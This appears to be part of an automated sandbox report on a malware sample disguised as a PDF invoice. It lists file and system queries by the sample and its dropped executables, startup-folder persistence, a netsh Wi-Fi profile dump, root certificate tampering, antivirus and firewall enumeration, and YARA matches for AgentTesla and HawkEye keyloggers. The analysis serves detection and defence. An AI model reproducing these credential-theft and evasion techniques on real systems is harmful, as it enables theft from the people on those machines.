                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings:

                            barindex
                            Uses netsh to modify the Windows network and firewall settingsShow sources
                            Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information:

                            barindex
                            Yara detected AgentTeslaShow sources
                            Source: Yara matchFile source: 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.445463818.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.430720019.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.269169616.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000000.419299258.0000000000E22000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.272090410.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.414221299.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.276618597.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.286093751.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.418225668.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.418385560.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.427152213.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000000.273140883.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000000.281843308.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.428390015.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.681903640.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.284634932.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.419784850.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.413803172.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000003.424187770.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.271788096.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000003.283633869.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: origigoods40.exe PID: 6172, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
                            Source: Yara matchFile source: 7.0.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.2.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.0.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.0.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.0.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Yara detected HawkEye KeyloggerShow sources
                            Source: Yara matchFile source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara matchFile source: dropped/hawkgoods.exe, type: DROPPED
